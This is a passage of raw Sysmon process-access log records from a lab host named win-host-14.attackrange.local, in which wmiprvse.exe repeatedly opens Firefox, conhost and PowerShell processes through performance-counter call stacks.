RNEL32.DLL+84d4 10341000x8000000000000000151959Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-3FFA-60CA-FC06-00000000D101}5312C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151958Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-283A-60CA-2404-00000000D101}5252C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151957Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-283A-60CA-2404-00000000D101}5252C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151956Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F803-00000000D101}6872C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151955Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F803-00000000D101}6872C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151954Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F703-00000000D101}5228c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151953Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26DA-60CA-F703-00000000D101}5228c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151952Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F603-00000000D101}6736C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151951Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F603-00000000D101}6736C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151950Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F503-00000000D101}6688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151949Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-26D8-60CA-F503-00000000D101}6688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151948Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-269B-60CA-EA03-00000000D101}6156C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151947Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-269B-60CA-EA03-00000000D101}6156C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151946Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E103-00000000D101}4292C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151945Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E103-00000000D101}4292C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151944Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:42.353{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281032C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-2672-60CA-E003-00000000D101}5836c:\windows\syswow64\windowspowershell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1607|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+4e20|C:\Windows\SYSTEM32\pdh.dll+4195|C:\Windows\System32\wbem\WmiPerfClass.dll+10b52|C:\Windows\System32\wbem\WmiPerfClass.dll+100c9|C:\Windows\System32\wbem\WmiPerfClass.dll+3531|C:\Windows\System32\wbem\WmiPerfClass.dll+42d2|C:\Windows\System32\wbem\WmiPerfClass.dll+26b1|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000151943Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 